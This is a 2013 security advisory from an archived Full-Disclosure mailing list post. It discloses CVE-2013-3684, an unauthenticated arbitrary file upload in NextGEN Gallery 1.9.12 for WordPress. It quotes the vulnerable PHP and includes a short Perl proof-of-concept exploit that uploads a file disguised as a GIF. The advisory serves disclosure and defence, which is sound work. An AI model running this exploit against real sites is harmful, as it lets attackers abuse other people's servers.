lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <51B88AF1.7080204@s21sec.com>
Date: Wed, 12 Jun 2013 16:51:29 +0200
From: Marcos Agüero <maguero@...sec.com>
To: Full-Disclosure <full-disclosure@...ts.grok.org.uk>
Subject: [CVE-2013-3684] NextGEN Gallery 1.9.12 Arbitrary
	File Upload

##############################################################


                      - S21Sec Advisory -


##############################################################

     Title:   NextGEN Gallery 1.9.12 Arbitrary File Upload
        ID:   S21SEC-046-en
    CVE ID:   CVE-2013-3684
  Severity:   High
    Status:   Fixed
   History:   27.May.2013 Vulnerability discovered
              28.May.2013 Vendor informed
              12.Jun.2013 Fix released
    Authors:  Marcos Agüero (maguero@...sec.com)
       URL: http://www.s21sec.com/images/labs/advisories/s21sec-046-en.txt
   Release:   Public


[ SUMMARY ]

NextGEN Gallery is a WordPress gallery plugin that offers sophisticated 
gallery management and
displays. It's one of the most popular plugins ever produced for 
WordPress, currently downloaded
around 30,000 times per week.

[ AFFECTED VERSIONS ]

     * NextGEN Gallery 1.9.12

[ DESCRIPTION ]

NextGEN Gallery allows file upload to unauthenticated users. Filters in 
place only permits uploads
of image files (extensions .gif, .png and .jpg). This avoids scripts 
execution problems but an
attacker could use the affected system to host files.

Vulnerability occurs due an innapropiate cookie validation in 
admin/upload.php script:

     if (wp_validate_auth_cookie()) {
         $results = wp_parse_auth_cookie();
         $logged_in = FALSE;
         if (isset($results['username']) && isset($results['expiration'])) {
             if (time() < floatval($results['expiration'])) {
                 if (($userdata = 
get_userdatabylogin($results['username'])))
                     $logged_in = $userdata->ID;
             }
         }

         if (!$logged_in) die("Login failure. -1");
         else if (!user_can($logged_in, 'NextGEN Upload images')) {
             die('You do not have permission to upload files. -2');
         }
     } # VULN: No auth cookie is okay!

This can be triggered by invoking 'nggupload' parameter on any valid 
wordpress URL:

ngggallery.php:

     // Handle upload requests
     add_action('init', array(&$this, 'handle_upload_request'));

     [...]
     function handle_upload_request()
     {
         if (isset($_GET['nggupload'])) {
             require_once(implode(DIRECTORY_SEPARATOR, array(
                 NGGALLERY_ABSPATH,
                 'admin',
                 'upload.php'
             )));
             throw new E_Clean_Exit();
         }
     }

[ POC ]
#! /usr/bin/perl
use LWP;
use HTTP::Request::Common;

my ($url, $file) = @ARGV;

my $ua = LWP::UserAgent->new();
my $req = POST $url,
     Content_Type => 'form-data',
     Content =>    [
             name => $name,
             galleryselect => 1,        # Gallery ID, should exist
             Filedata => [ "$file", "file.gif",  Content_Type => 
'image/gif' ]
         ];
my $res = $ua->request( $req );
if( $res->is_success ) {
     print $res->content;
} else {
     print $res->status_line, "\n";
}

[ SOLUTION ]

Version 1.9.13 released by vendor. 
http://wordpress.org/plugins/nextgen-gallery/

[ REFERENCES ]

* S21Sec
   http://www.s21sec.com

-- 
S21sec

*Marcos Agüero*
/S21sec ACSS/

Tlf: +34 902 222 521

www.s21sec.com <http://www.s21sec.com>, blog.s21sec.com 
<http://blog.s21sec.com> securityblog.s21sec.com 
<http://securityblog.s21sec.com>

Salvo que se indique lo contrario, esta información es CONFIDENCIAL y 
contiene datos de carácter personal que han de ser tratados conforme a 
la legislación vigente en materia de protección de datos. Si usted no es 
destinatario original de este mensaje, le comunicamos que no está 
autorizado a revisar, reenviar, distribuir, copiar o imprimir la 
información en él contenida y le rogamos que proceda a borrarlo de sus 
sistemas.

Unless contrary indicated, this information is CONFIDENTIAL and contains 
personal data that shall be processed according to personal data 
protection law in force. If you are not the named addressee of this 
message you are hereby notified that any review, dissemination, 
distribution, copying or printing of this message is strictly prohibited 
and we urge you to delete it from your Systems.

Antes de imprimir este mensaje valora si verdaderamente es necesario. De 
esta forma contribuimos a la preservación del Medio Ambiente.


Content of type "text/html" skipped

Download attachment "image003.gif" of type "image/gif" (1130 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ